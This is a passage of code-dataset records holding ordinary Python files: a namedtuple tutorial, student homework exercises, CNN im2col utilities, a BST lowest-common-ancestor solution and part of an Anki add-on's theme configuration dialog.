custom_colors['bluish_green'])\n\n\nplt.tight_layout()\nplt.savefig('../../results/xor/XOR.pdf')\nplt.close()\n","repo_name":"apayeur/spikingburstprop","sub_path":"analysis/xor/plot_xor.py","file_name":"plot_xor.py","file_ext":"py","file_size_in_byte":13508,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"25331713285","text":"from collections import namedtuple\nSubscriber = namedtuple('Subscriber', ['addr', 'joined'])\nsub = Subscriber('abc@gmail.com', '2010-02-02')\nprint(sub)\nprint(sub.addr)\nprint(sub.joined)\n\n# Reference to positional elements often make the code a bit less expensive and more\n# dependent on the structure of the records. Here is a version that uses a namedtuple\nStock = namedtuple('Stock', ['name', 'shares', 'price'])\ndef compute_cost(records):\n total = 0.0\n for rec in records:\n s = Stock(*rec)\n total += s.shares * s.price\n return total\n\n# If you need to change any of the attributes, it can be done using the _replace() method\n# of a namedtuple instance, which makes an entirely new namedtuple with specified values\n# replaced\ns = Stock1('ACME', 100, 123.45)\ns = s._replace(shares=75)\nprint(s)\n\n# A subtle use of the _replace() method is that it can be a convenient way to populate\n# named tuples that have optional or missing field. To do this, you make a prototype\n# tuple containing the default values and then use _replace() to create new instances \n# with values replaced.\nStock2 = namedtuple('Stock', ['name', 'shares', 'price', 'date', 'time'])\n# Create a prototype instance\nstock_prototype = Stock('', 0, 0.0, None, None)\n# Function to convert a dictionary to a Stock\ndef dict_to_stock(s):\n return stock_prototype._replace(**s)\n\na = {'name': 'ACME', 'shares': 100, 'price': 123.45}\nprint(dict_to_stock(a))\nb = {'name': 'ACME', 'shares': 100, 'price': 123.45, 'date': '12/17/2012'}\nprint(dict_to_stock(b))","repo_name":"pujansoni/python","sub_path":"1_18_mapping_name_to_sequence_elements.py","file_name":"1_18_mapping_name_to_sequence_elements.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34002952431","text":"\"\"\"a =int(input())\r\nb = int(input())\r\nc = int(input())\r\nz = a+b+c\r\nx = z//2\r\nprint(x)\"\"\"\r\n\"\"\"\"n1 = int(input(\"Введите целое число: \"))\r\nn2 = 0\r\n\r\nwhile n1 > 0:\r\n digit = n1 % 10\r\n n1 = n1 // 10\r\n n2 = n2 * 10\r\n n2 = n2 + digit\r\n\r\nprint('', n2)\"\"\"\r\n#print(\" *** ***** *** *****\\n*\\t *\\t\\t *\\t *\\t *\\t *\\n* *** *\\t\\t*\\t\\t *\\t***\\t*\\t *\\n*\\t *\\t\\t*****\\t *\\t\\t*\\t * \")\r\n\r\n\"\"\"a =int(input())\r\nb = int(input())\r\nc = int(input())\r\nz = a+b+c\r\nx = z//2\r\nprint(x)\"\"\"\r\n#a = int(input())\r\n#b = int(input())\r\n#c = int(input())\r\n#print(a // 2 + b // 2 + c // 2 + a % 2 + b % 2 + c % 2)\r\n\"\"\"n1= int(input('введите ваше число' ))\r\nn= ('n1')\r\nn2 = ('n % 10 ')\r\nn3= ('n2 // 10')\r\nn4= (\"n3*10+n2*10+n\")\r\nprint( \"\" , n4)\"\"\"\r\n\"\"\"numb= int(input())\r\nnumb2 = ( numb // 10) #12\r\nnumb3 =(numb % 10) #3\r\nnumb4 = ( numb2 % 10) #2\r\nn0= (numb //100)\r\nn5=((numb3*10+numb4)*10+n0)\r\nprint(n5)\"\"\"\r\n\r\n\"\"\"n1 = int(input())\r\nn = 1\r\nwhile n ** 2 <= n1:\r\n print(n ** 2)\r\n n += 1 \"\"\"\r\n\r\n\"\"\"n= int(input(\"your number\"))\r\nn0=2\r\nn1=1\r\nwhile n0 <= n:\r\n n0 *= 2\r\n n1 +=1\r\n\r\n print(n1-1,n0//2)\"\"\"\r\n\"\"\"x=int(input())\r\ns=0\r\nwhile x!=0:\r\n 
x=int(input())\r\ns+=1\r\nprint(x)\"\"\"\r\n\r\n#задание 13\r\n#x= input(\"\")\r\n#print(x.count(\" \")+1)\r\n\r\n#задание 10\r\n#x=input(\"\")\r\n#x= x.replace(\"h\",\"H\",x.count(\"h\")-1).replace(\"H\",\"h\",1)\r\n#print(x)\r\n\r\n\r\n#задание 10\r\n\"\"\"str=input()\r\nprint(str[2])#a\r\nprint(str[-2])#b\r\nprint(str[0:5])#c\r\nprint(str[:-2])#d\r\nprint(str[::2])#e\r\nprint(str[1::2])#f\r\nprint(str[::-1])#g\r\nprint(str[::-2])#h\r\nprint(len(str)-1)#i \"\"\"\r\n\r\n\r\n\"\"\"inputVal = int(input())\r\ninputCount = 0\r\ninputSum = 0\r\ninputEven = 0\r\ninputOdd = 0\r\ninputMin = inputVal\r\ninputMax = inputVal\r\nwhile inputVal != 0:\r\n inputCount += 1\r\n inputSum += inputVal\r\n if inputMin > inputVal:\r\n inputMin = inputVal\r\n if inputVal > inputMax:\r\n inputMax = inputVal\r\n if inputVal % 2 == 0:\r\n inputEven += 1\r\n else:\r\n inputOdd += 1\r\n inputVal=int(input())\r\n\r\n\r\n\r\nprint( 'Count: {}'.format(inputCount))\r\nprint(\"Sum: {}\" . format(inputSum))\r\nprint(\"Average: {}\" . format(inputSum / inputCount))\r\nprint(\"min: {}\" .format(inputMin))\r\nprint(\"max: {}\". format(inputMax))\r\nprint(\"even: {}\".format(inputEven))\r\nprint(\"odd: {}\".format(inputOdd))\"\"\"\r\n\r\n\r\n#задание 16\r\nfrom random import randint\r\n\r\na=[randint(1,20) for _ in range(10)]\r\nprint(\", \".join( repr(e) for e in a))\r\nk = int(input())\r\nfor i in range(k + 1, len(a)):\r\n a[i - 1] = a[i]\r\na.pop()\r\nprint(', '.join([str(i) for i in a]))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"scope7336/hillel_world_python","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69978462974","text":"import os\nimport gzip\nimport math\nimport pickle\nimport numpy as np\nimport urllib.request\nfrom PIL import Image\nfrom skimage import transform\nimport matplotlib.pyplot as plt\nimport concurrent.futures as cf\n\n\n \n\n\ndef dataloader(X, y, BATCH_SIZE):\n \"\"\"\n Returns a data generator.\n\n Parameters:\n - X: dataset examples.\n - y: ground truth labels.\n \"\"\"\n n = len(X)\n for t in range(0, n, BATCH_SIZE):\n yield X[t:t+BATCH_SIZE, ...], y[t:t+BATCH_SIZE, ...]\n \n\n\ndef save_params_to_file(model):\n \"\"\"\n Saves model parameters to a file.\n\n Parameters:\n -model: a CNN architecture.\n \"\"\"\n # Make save_weights/ accessible from every folders.\n terminal_path = [\"/content/drive/My Drive/Colab Notebooks/Fruit/src/fast/save_weights/\",\"src/fast/save_weights/\", \"fast/save_weights/\", '../fast/save_weights/', \"save_weights/\", \"../save_weights/\"]\n dirPath = None\n for path in terminal_path:\n if os.path.isdir(path):\n dirPath = path\n if dirPath == None:\n raise FileNotFoundError(\"save_params_to_file(): Impossible to find save_weights/ from current folder. 
You need to manually add the path to it in the \\'terminal_path\\' list and the run the function again.\")\n\n weights = model.get_params()\n if dirPath == '/content/drive/My Drive/Colab Notebooks/Fruit/src/fast/save_weights/': # We run the code from demo notebook.\n with open(dirPath + \"demo_weights.pkl\",\"wb\") as f:\n pickle.dump(weights, f)\n else:\n with open(dirPath + \"final_weights.pkl\",\"wb\") as f:\n pickle.dump(weights, f)\n\ndef load_params_from_file(model, isNotebook=False):\n \"\"\"\n Loads model parameters from a file.\n\n Parameters:\n -model: a CNN architecture.\n \"\"\"\n if isNotebook: # We run from demo-notebooks/\n pickle_in = open(\"/content/drive/My Drive/Colab Notebooks/Fruit/src/fast/save_weights/demo_weights.pkl\", 'rb')\n params = pickle.load(pickle_in)\n model.set_params(params)\n else:\n # Make final_weights.pkl file accessible from every folders.\n terminal_path = [\"/content/drive/My Drive/Colab Notebooks/Fruit/src/fast/save_weights/final_weights.pkl\",\"src/fast/save_weights/final_weights.pkl\", \"fast/save_weights/final_weights.pkl\",\n \"save_weights/final_weights.pkl\", \"../save_weights/final_weights.pkl\"]\n\n filePath = None\n for path in terminal_path:\n if os.path.isfile(path):\n filePath = path\n if filePath == None:\n raise FileNotFoundError('load_params_from_file(): Cannot find final_weights.pkl from your current folder. You need to manually add it to terminal_path list and the run the function again.')\n\n pickle_in = open(filePath, 'rb')\n params = pickle.load(pickle_in)\n model.set_params(params)\n return model\n \ndef prettyPrint3D(M):\n \"\"\"\n Displays a 3D matrix in a pretty way.\n\n Parameters:\n -M: Matrix of shape (m, n_H, n_W, n_C) with m, the number 3D matrices.\n \"\"\"\n m, n_C, n_H, n_W = M.shape\n\n for i in range(m):\n \n for c in range(n_C):\n print('Image {}, channel {}'.format(i + 1, c + 1), end='\\n\\n') \n\n for h in range(n_H):\n print(\"/\", end=\"\")\n\n for j in range(n_W):\n\n print(M[i, c, h, j], end = \",\")\n\n print(\"/\", end='\\n\\n')\n \n print('-------------------', end='\\n\\n')\n\n\ndef get_indices(X_shape, HF, WF, stride, pad):\n \"\"\"\n Returns index matrices in order to transform our input image into a matrix.\n\n Parameters:\n -X_shape: Input image shape.\n -HF: filter height.\n -WF: filter width.\n -stride: stride value.\n -pad: padding value.\n\n Returns:\n -i: matrix of index i.\n -j: matrix of index j.\n -d: matrix of index d. 
\n (Use to mark delimitation for each channel\n during multi-dimensional arrays indexing).\n \"\"\"\n # get input size\n m, n_C, n_H, n_W = X_shape\n\n # get output size\n out_h = int((n_H + 2 * pad - HF) / stride) + 1\n out_w = int((n_W + 2 * pad - WF) / stride) + 1\n \n # ----Compute matrix of index i----\n\n # Level 1 vector.\n level1 = np.repeat(np.arange(HF), WF)\n # Duplicate for the other channels.\n level1 = np.tile(level1, n_C)\n # Create a vector with an increase by 1 at each level.\n everyLevels = stride * np.repeat(np.arange(out_h), out_w)\n # Create matrix of index i at every levels for each channel.\n i = level1.reshape(-1, 1) + everyLevels.reshape(1, -1)\n\n # ----Compute matrix of index j----\n \n # Slide 1 vector.\n slide1 = np.tile(np.arange(WF), HF)\n # Duplicate for the other channels.\n slide1 = np.tile(slide1, n_C)\n # Create a vector with an increase by 1 at each slide.\n everySlides = stride * np.tile(np.arange(out_w), out_h)\n # Create matrix of index j at every slides for each channel.\n j = slide1.reshape(-1, 1) + everySlides.reshape(1, -1)\n\n # ----Compute matrix of index d----\n\n # This is to mark delimitation for each channel\n # during multi-dimensional arrays indexing.\n d = np.repeat(np.arange(n_C), HF * WF).reshape(-1, 1)\n\n return i, j, d\n\ndef im2col(X, HF, WF, stride, pad):\n \"\"\"\n Transforms our input image into a matrix.\n\n Parameters:\n - X: input image.\n - HF: filter height.\n - WF: filter width.\n - stride: stride value.\n - pad: padding value.\n\n Returns:\n -cols: output matrix.\n \"\"\"\n # Padding\n X_padded = np.pad(X, ((0,0), (0,0), (pad, pad), (pad, pad)), mode='constant')\n i, j, d = get_indices(X.shape, HF, WF, stride, pad)\n # Multi-dimensional arrays indexing.\n cols = X_padded[:, d, i, j]\n cols = np.concatenate(cols, axis=-1)\n return cols\n\ndef col2im(dX_col, X_shape, HF, WF, stride, pad):\n \"\"\"\n Transform our matrix back to the input image.\n\n Parameters:\n - dX_col: matrix with error.\n - X_shape: input image shape.\n - HF: filter height.\n - WF: filter width.\n - stride: stride value.\n - pad: padding value.\n\n Returns:\n -x_padded: input image with error.\n \"\"\"\n # Get input size\n N, D, H, W = X_shape\n # Add padding if needed.\n H_padded, W_padded = H + 2 * pad, W + 2 * pad\n X_padded = np.zeros((N, D, H_padded, W_padded))\n \n # Index matrices, necessary to transform our input image into a matrix. 
\n i, j, d = get_indices(X_shape, HF, WF, stride, pad)\n # Retrieve batch dimension by spliting dX_col N times: (X, Y) => (N, X, Y)\n dX_col_reshaped = np.array(np.hsplit(dX_col, N))\n # Reshape our matrix back to image.\n # slice(None) is used to produce the [::] effect which means \"for every elements\".\n np.add.at(X_padded, (slice(None), d, i, j), dX_col_reshaped)\n # Remove padding from new image if needed.\n if pad == 0:\n return X_padded\n elif type(pad) is int:\n return X_padded[pad:-pad, pad:-pad, :, :]\n","repo_name":"jerryold/NTHU_Deeplearning_homework","sub_path":"hw3_109064518_高聖哲/hw3_109064518/Fruit/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1803439851","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n while root != None:\n if(p.val < root.val and q.val < root.val):\n root = root.left\n elif(p.val > root.val and q.val > root.val):\n root = root.right\n elif(p.val < root.val and q.val > root.val) or (p.val > root.val and q.val < root.val):\n return root\n elif((p.val == root.val) and (q.val > root.val)) or ((p.val == root.val) and (q.val < root.val)):\n return p\n elif(q.val == root.val and p.val > root.val) or (q.val == root.val and p.val < root.val):\n return q \n\n################################################################################\n# Task:\n# Given a binary search tree (BST), find the lowest common ancestor (LCA) of two given nodes in the BST.\n# According to the definition of LCA on Wikipedia: “The lowest common ancestor is defined between two nodes p and q as the lowest node in T that has both p and q as descendants (where we allow a node to be a descendant of itself).”\n\n################################################################################\n# (Solution developed with help from GeeksforGeeks)\n# Time: Unknown, definitely more than 30 minutes. 
\n# What can I learn here?\n# Don't always need to use recursion to traverse BST\n# If comparing nodes to BST, check if values are greater or less than BST, and traverse like that.\n","repo_name":"1230fahid/DS-A","sub_path":"BST/lc/235.py","file_name":"235.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17197155904","text":"import json\nfrom aqt import mw, gui_hooks, appVersion\nfrom aqt.qt import *\nfrom .modules import *\nfrom .translation import get_texts\nfrom ..config import config, write_config, get_config\nfrom aqt.utils import showInfo\nfrom aqt.webview import AnkiWebView\nfrom .logger import logger\nfrom aqt.theme import theme_manager, colors\nfrom ..injections.toolbar import redraw_toolbar, redraw_toolbar_legacy\nfrom .themes import system_themes, themes, write_theme, get_theme, sync_theme, clone_theme, delete_theme\nif module_has_attribute(\"anki.lang\", \"current_lang\"):\n from anki.lang import current_lang, lang_to_disk_lang, compatMap\nelse:\n from anki.lang import currentLang as current_lang, lang_to_disk_lang, compatMap\nfrom .dark_title_bar import set_dark_titlebar_qt, dwmapi\nanki_version = tuple(int(segment) for segment in appVersion.split(\".\"))\n\ntheme = config['theme']\nthemes_parsed = get_theme(theme)\ncolor_mode = 3 if theme_manager.get_night_mode() else 2 # 1 = light and 2 = dark\n\ndef get_anki_lang():\n lang = lang_to_disk_lang(current_lang)\n if lang in compatMap:\n lang = compatMap[lang]\n lang = lang.replace(\"-\", \"_\")\n return lang\n\nclass AnkiRedesignThemeEditor(QDialog):\n def __init__(self, parent, *args, **kwargs):\n super().__init__(parent=parent or mw, *args, **kwargs)\n self.config_editor = parent\n self.texts = get_texts(get_anki_lang())\n self.setWindowModality(Qt.ApplicationModal)\n self.setWindowTitle(self.texts[\"theme_editor_window_title\"])\n self.setSizePolicy(self.make_size_policy())\n self.setMinimumSize(420, 420)\n self.setAttribute(Qt.WidgetAttribute.WA_DeleteOnClose)\n set_dark_titlebar_qt(self, dwmapi, fix=False)\n # Root layout\n self.root_layout = QVBoxLayout(self)\n # Main layout\n self.layout = QVBoxLayout()\n self.textedit = QTextEdit()\n themes_plaintext = open(themes[theme], encoding='utf-8').read()\n self.textedit.setPlainText(themes_plaintext)\n self.layout.addWidget(self.textedit)\n self.root_layout.addLayout(self.layout)\n self.root_layout.addLayout(self.make_button_box())\n\n def save_edit(self) -> None:\n themes_parsed = json.loads(self.textedit.toPlainText())\n write_theme(themes[theme], themes_parsed)\n self.config_editor.update()\n self.accept()\n\n def make_button_box(self) -> QWidget:\n def cancel():\n button = QPushButton(self.texts[\"cancel_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n qconnect(button.clicked, self.accept)\n return button\n\n def save():\n button = QPushButton(self.texts[\"save_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n button.setDefault(True)\n button.setShortcut(\"Ctrl+Return\")\n button.clicked.connect(lambda _: self.save_edit())\n return button\n\n button_box = QHBoxLayout()\n button_box.addStretch()\n button_box.addWidget(cancel())\n button_box.addWidget(save())\n return button_box\n\n def make_size_policy(self) -> QSizePolicy:\n size_policy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Minimum)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n 
size_policy.setHeightForWidth(self.sizePolicy().hasHeightForWidth())\n return size_policy\n\nclass AnkiRedesignConfigDialog(QDialog):\n def __init__(self, parent: QWidget, *args, **kwargs):\n super().__init__(parent=parent or mw, *args, **kwargs)\n self.texts = get_texts(get_anki_lang())\n self.setWindowModality(Qt.ApplicationModal)\n self.setWindowTitle(self.texts[\"configuration_window_title\"])\n self.setSizePolicy(self.make_size_policy())\n self.setMinimumSize(420, 580)\n self.setAttribute(Qt.WidgetAttribute.WA_DeleteOnClose)\n set_dark_titlebar_qt(self, dwmapi, fix=False)\n\n # Color/theme\n # Loads theme color\n self.theme_colors = themes_parsed.get(\"colors\")\n self.updates = []\n self.theme_general = [\"TEXT_FG\", \"WINDOW_BG\", \"FRAME_BG\", \"BUTTON_BG\", \"BUTTON_FOCUS_BG\", \"TOOLTIP_BG\", \"BORDER\", \"MEDIUM_BORDER\", \"FAINT_BORDER\", \"HIGHLIGHT_BG\", \"HIGHLIGHT_FG\" , \"LINK\", \"DISABLED\", \"SLIGHTLY_GREY_TEXT\", \"FOCUS_SHADOW\"]\n self.theme_decks = [\"CURRENT_DECK\", \"NEW_COUNT\", \"LEARN_COUNT\", \"REVIEW_COUNT\", \"ZERO_COUNT\"]\n self.theme_browse = [\"BURIED_FG\", \"SUSPENDED_FG\", \"MARKED_BG\", \"FLAG1_BG\", \"FLAG1_FG\", \"FLAG2_BG\", \"FLAG2_FG\", \"FLAG3_BG\", \"FLAG3_FG\", \"FLAG4_BG\", \"FLAG4_FG\", \"FLAG5_BG\", \"FLAG5_FG\", \"FLAG6_BG\", \"FLAG6_FG\", \"FLAG7_BG\", \"FLAG7_FG\"]\n self.theme_extra = []\n if anki_version >= (2, 1, 56):\n self.theme_general = ['FG', 'FG_DISABLED', 'FG_FAINT', 'FG_LINK', 'FG_SUBTLE'] + ['CANVAS', 'CANVAS_CODE', 'CANVAS_ELEVATED', 'CANVAS_INSET', 'CANVAS_OVERLAY']\n self.theme_decks = ['BORDER', 'BORDER_FOCUS', 'BORDER_STRONG', 'BORDER_SUBTLE'] + ['BUTTON_BG', 'BUTTON_DISABLED', 'BUTTON_GRADIENT_END', 'BUTTON_GRADIENT_START', 'BUTTON_HOVER_BORDER', 'BUTTON_PRIMARY_BG', 'BUTTON_PRIMARY_DISABLED', 'BUTTON_PRIMARY_GRADIENT_END', 'BUTTON_PRIMARY_GRADIENT_START']\n self.theme_browse = ['ACCENT_CARD', 'ACCENT_DANGER', 'ACCENT_NOTE'] + ['STATE_BURIED', 'STATE_LEARN', 'STATE_MARKED', 'STATE_NEW', 'STATE_REVIEW', 'STATE_SUSPENDED'] + ['FLAG_1', 'FLAG_2', 'FLAG_3', 'FLAG_4', 'FLAG_5', 'FLAG_6', 'FLAG_7']\n self.theme_extra = ['SCROLLBAR_BG', 'SCROLLBAR_BG_ACTIVE', 'SCROLLBAR_BG_HOVER'] + ['HIGHLIGHT_BG', 'HIGHLIGHT_FG'] + ['SELECTED_BG', 'SELECTED_FG'] + ['SHADOW', 'SHADOW_FOCUS', 'SHADOW_INSET', 'SHADOW_SUBTLE']\n\n # Root layout\n self.root_layout = QVBoxLayout(self)\n # Main layout\n self.layout = QVBoxLayout()\n # Initialize tab screen\n self.tabs = QTabWidget(objectName=\"tabs\")\n self.tabs.setFocusPolicy(Qt.FocusPolicy.StrongFocus)\n self.tab_general = QWidget(objectName=\"general\")\n self.tab_general.setLayout(\n self.create_color_picker_layout(self.theme_general))\n self.tab_decks = QWidget(objectName=\"decks\")\n self.tab_decks.setLayout(\n self.create_color_picker_layout(self.theme_decks))\n self.tab_browse = QWidget(objectName=\"browse\")\n self.tab_browse.setLayout(\n self.create_color_picker_layout(self.theme_browse))\n self.tab_extra = QWidget(objectName=\"extra\")\n self.tab_extra.setLayout(\n self.create_color_picker_layout(self.theme_extra))\n\n self.tab_settings = QWidget(objectName=\"settings\")\n self.settings_layout = QFormLayout()\n self.theme_label = QLabel(self.texts[\"theme_label\"])\n self.theme_label.setStyleSheet(\n 'QLabel { font-size: 14px; font-weight: bold }')\n self.settings_layout.addRow(self.theme_label)\n for key in themes:\n self.radio = self.theme_button(key, not key in system_themes)\n self.settings_layout.addRow(key, self.radio)\n self.settings_layout.addRow(QLabel())\n\n self.font_label = 
QLabel(self.texts[\"font_label\"])\n self.font_label.setStyleSheet(\n 'QLabel { font-size: 14px; font-weight: bold }')\n self.settings_layout.addRow(self.font_label)\n self.interface_font = QFontComboBox()\n self.interface_font.setFixedWidth(200)\n self.interface_font.setCurrentFont(QFont(config[\"font\"]))\n self.settings_layout.addRow(self.interface_font)\n\n self.font_size = QSpinBox()\n self.font_size.setFixedWidth(200)\n self.font_size.setValue(config[\"font_size\"])\n self.font_size.setSuffix(\"px\")\n self.settings_layout.addRow(self.font_size)\n self.settings_layout.addRow(QLabel())\n\n self.fix_label = QLabel(self.texts[\"addon_compatibility_fix_label\"])\n self.fix_label.setStyleSheet(\n 'QLabel { font-size: 14px; font-weight: bold }')\n self.settings_layout.addRow(self.fix_label)\n self.addon_more_overview_stats_check = self.checkbox(\n \"addon_more_overview_stats\")\n self.settings_layout.addRow(\n \"More Overview Stats 21\", self.addon_more_overview_stats_check)\n self.addon_advanced_review_bottom_bar_check = self.checkbox(\n \"addon_advanced_review_bottom_bar\")\n self.settings_layout.addRow(\n \"Advanced Review Bottom Bar\", self.addon_advanced_review_bottom_bar_check)\n self.addon_no_distractions_full_screen_check = self.checkbox(\n \"addon_no_distractions_full_screen\")\n self.settings_layout.addRow(\n \"No Distractions Full Screen\", self.addon_no_distractions_full_screen_check)\n\n self.tab_settings.setLayout(self.settings_layout)\n\n # Add tabs\n self.tabs.resize(300, 200)\n self.tabs.addTab(self.tab_settings, self.texts[\"settings_tab\"])\n self.tabs.addTab(self.tab_general, self.texts[\"general_tab\"])\n self.tabs.addTab(self.tab_decks, self.texts[\"decks_tab\"])\n self.tabs.addTab(self.tab_browse, self.texts[\"browse_tab\"])\n self.tabs.addTab(self.tab_extra, \"Extra\")\n # Add tabs to widget\n self.layout.addWidget(self.tabs)\n\n self.root_layout.addLayout(self.layout)\n self.root_layout.addLayout(self.make_button_box())\n self.setLayout(self.root_layout)\n self.show()\n\n def update(self) -> None:\n global themes_parsed\n themes_parsed = get_theme(theme)\n self.theme_colors = themes_parsed.get(\"colors\")\n for update in self.updates:\n update()\n\n def checkbox(self, key: str) -> QCheckBox:\n checkbox = QCheckBox()\n\n def update() -> None:\n value = config[key]\n checkbox.setChecked(value)\n\n self.updates.append(update)\n update()\n return checkbox\n\n def theme_button(self, key: str, custom=False):\n layout = QGridLayout()\n radio = self.radio_button(key)\n clone_button = QPushButton(self.texts[\"clone_button\"])\n clone_button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n clone_button.clicked.connect(lambda _: self.clone_theme(key))\n layout.addWidget(radio, 0, 0)\n if custom:\n delete_button = QPushButton(self.texts[\"delete_button\"])\n delete_button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n delete_button.clicked.connect(lambda _: self.delete_theme(key))\n layout.addWidget(delete_button, 0, 1)\n else:\n sync_button = QPushButton(self.texts[\"sync_button\"])\n sync_button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n sync_button.clicked.connect(lambda _: self.sync_theme(key))\n layout.addWidget(sync_button, 0, 1)\n layout.addWidget(clone_button, 0, 2)\n layout.addWidget(QLabel(), 0, 3)\n layout.addWidget(QLabel(), 0, 4)\n return layout\n\n def clone_theme(self, key):\n global themes\n logger.debug(\"Clone: \" + key)\n popup = QMessageBox()\n popup.setIcon(QMessageBox.Information)\n popup.setText(self.texts[\"clone_message\"] 
% key)\n popup.setWindowTitle(self.texts[\"clone_window_title\"] % key)\n popup.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n if popup.exec() == QMessageBox.Yes:\n showInfo(_(self.texts[\"clone_success_message\"] % key))\n themes = clone_theme(key, themes)\n self.restart()\n\n def delete_theme(self, key):\n global themes\n logger.debug(\"Delete: \" + key)\n popup = QMessageBox()\n popup.setIcon(QMessageBox.Information)\n popup.setText(self.texts[\"delete_message\"] % key)\n popup.setWindowTitle(self.texts[\"delete_window_title\"] % key)\n popup.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n if popup.exec() == QMessageBox.Yes:\n showInfo(_(self.texts[\"delete_success_message\"] % key))\n themes = delete_theme(key, themes)\n self.restart()\n\n def sync_theme(self, key):\n global themes\n logger.debug(\"Sync: \" + key)\n popup = QMessageBox()\n popup.setIcon(QMessageBox.Information)\n popup.setText(self.texts[\"sync_message\"] % key)\n popup.setWindowTitle(self.texts[\"sync_window_title\"] % key)\n popup.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n if popup.exec() == QMessageBox.Yes:\n showInfo(_(self.texts[\"sync_success_message\"] % key))\n themes = sync_theme(key, themes)\n self.restart()\n\n def restart(self):\n # Close window\n self.accept()\n self.close()\n # Open window again\n mw.anki_redesign_cache = AnkiRedesignConfigDialog(mw)\n mw.anki_redesign_cache.exec()\n\n def radio_button(self, key: str) -> QRadioButton:\n radio = QRadioButton()\n\n def update() -> None:\n if theme == key:\n radio.setChecked(True)\n elif radio.isChecked():\n radio.setChecked(False)\n\n def toggle(checked) -> None:\n global theme\n if checked:\n theme = key\n self.update()\n\n self.updates.append(update)\n radio.toggled.connect(lambda checked: toggle(checked))\n update()\n return radio\n\n def color_input(self, key: str) -> QPushButton:\n button = QPushButton()\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n button.setFixedWidth(25)\n button.setFixedHeight(25)\n button.setToolTip(self.theme_colors.get(key)[1])\n\n color_dialog = QColorDialog(self)\n\n def set_color(rgb: str) -> None:\n # Check for valid color\n color = QColor()\n color.setNamedColor(rgb)\n if not color.isValid():\n return\n # Update color\n color_dialog.setCurrentColor(color)\n button.setStyleSheet(\n 'QPushButton{ background-color: \"%s\"; border: none; border-radius: 2px}' % rgb)\n\n def update() -> None:\n # TODO: fix this\n try:\n rgb = self.theme_colors.get(key)[color_mode]\n except:\n rgb = \"#ff0000\"\n set_color(rgb)\n\n def save(color: QColor) -> None:\n rgb = color.name(QColor.NameFormat.HexRgb)\n self.theme_colors[key][color_mode] = rgb\n set_color(rgb)\n\n self.updates.append(update)\n color_dialog.colorSelected.connect(lambda color: save(color))\n button.clicked.connect(lambda _: color_dialog.exec())\n return button\n\n def create_color_picker_layout(self, colors) -> None:\n layout = QFormLayout()\n for key in colors:\n layout.addRow(self.theme_colors.get(key)[0], self.color_input(key))\n return layout\n\n def theme_file_editor(self) -> None:\n diag = AnkiRedesignThemeEditor(self)\n diag.show()\n\n def make_button_box(self) -> QWidget:\n def advanced():\n button = QPushButton(self.texts[\"advanced_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n qconnect(button.clicked, self.theme_file_editor)\n return button\n\n def cancel():\n button = QPushButton(self.texts[\"cancel_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n 
qconnect(button.clicked, self.accept)\n return button\n\n def save():\n button = QPushButton(self.texts[\"save_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n button.setDefault(True)\n button.setShortcut(\"Ctrl+Return\")\n button.clicked.connect(lambda _: self.save())\n return button\n\n button_box = QHBoxLayout()\n button_box.addWidget(advanced())\n button_box.addStretch()\n button_box.addWidget(cancel())\n button_box.addWidget(save())\n return button_box\n\n def make_size_policy(self) -> QSizePolicy:\n size_policy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Minimum)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.sizePolicy().hasHeightForWidth())\n return size_policy\n\n def save(self) -> None:\n # Save settings and update config\n global config, color_mode\n config[\"font\"] = self.interface_font.currentFont().family()\n config[\"font_size\"] = self.font_size.value()\n config['addon_more_overview_stats'] = self.addon_more_overview_stats_check.isChecked()\n config['addon_advanced_review_bottom_bar'] = self.addon_advanced_review_bottom_bar_check.isChecked()\n config['addon_no_distractions_full_screen'] = self.addon_no_distractions_full_screen_check.isChecked()\n config[\"theme\"] = theme\n write_config(config)\n config = get_config()\n logger.debug(config)\n\n # Write and update theme\n color_mode = 3 if theme_manager.get_night_mode() else 2 # 2 = light and 3 = dark\n themes_parsed[\"colors\"] = self.theme_colors\n write_theme(themes[theme], themes_parsed)\n update_theme()\n\n # ShowInfo for both new and legacy support\n showInfo(_(self.texts[\"changes_message\"]))\n self.accept()\n\n\ndef check_legacy_colors() -> None:\n try:\n _ = colors.items()\n except:\n return False\n return True\n\n\ndef refresh_all_windows() -> None:\n # Redraw top toolbar\n mw.toolbar.draw()\n if attribute_exists(gui_hooks, \"top_toolbar_did_init_links\"):\n gui_hooks.top_toolbar_did_init_links.append(lambda a, b: [redraw_toolbar_legacy(a, b), gui_hooks.top_toolbar_did_init_links.remove(print)])\n\n # Redraw main body\n if mw.state == \"review\":\n mw.reviewer._initWeb()\n # Legacy check\n if 